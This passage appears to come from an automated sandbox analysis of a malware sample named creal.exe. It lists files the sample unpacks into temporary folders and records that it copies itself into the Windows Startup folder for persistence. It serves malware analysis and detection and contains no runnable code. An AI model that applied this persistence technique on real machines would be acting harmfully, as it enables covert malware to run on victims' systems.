            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_wmi.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\sqlite3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_overlapped.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\sqlite3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\libssl-3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\libffi-8.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\pyexpat.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_ctypes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\python312.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_wmi.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Protocol\_scrypt.pydJump to dropped file

            Boot Survival

            barindex
            Drops PE files to the startup folder
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeJump to behavior
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeJump to behavior
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6051F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF67A6051F0
            Source: C:\Users\user\Desktop\creal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\bcrypt\_bcrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\bcrypt\_bcrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_queue.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_ssl.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_wmi.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_overlapped.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_ARC4.pydJump to dropped file
